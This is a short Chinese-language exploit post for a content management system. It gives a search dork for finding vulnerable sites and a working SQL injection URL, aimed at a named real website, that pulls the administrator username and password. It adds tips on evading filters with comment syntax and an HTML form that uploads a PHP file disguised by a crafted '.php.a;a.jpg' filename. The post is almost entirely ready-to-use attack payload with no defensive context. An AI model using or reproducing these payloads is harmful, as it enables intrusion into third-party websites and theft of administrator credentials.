作者:YoCo Smart - 习科
漏洞版本:我测试的是V2.0.5(20120412),官方演示站V2.0.15(20121030)也有这个漏洞
以inurl:/news/html/?411.html
为关键字搜索
http://www.511qq.com/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html
需要注意的是,这个伪静态的注入和URL的普通GET注入不太相同
普通url的get注入,%20,%23,+等等,都可以用,但是这里不行,会被直接传递到到url中,所以用/**/这个注释符号是再好不过的了
有很多浏览器会本地转义单引号'为%27等,注意一下,设置浏览器不要自动转义
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> <input type="text" name="fileName" value="404.php.a;a.jpg" /> <input type="hidden" name="attachPath" value="news/pics/" /> <input type="file" name="fileData" size="14" /></td> <input type="submit" name="button" value="确定" /> </form>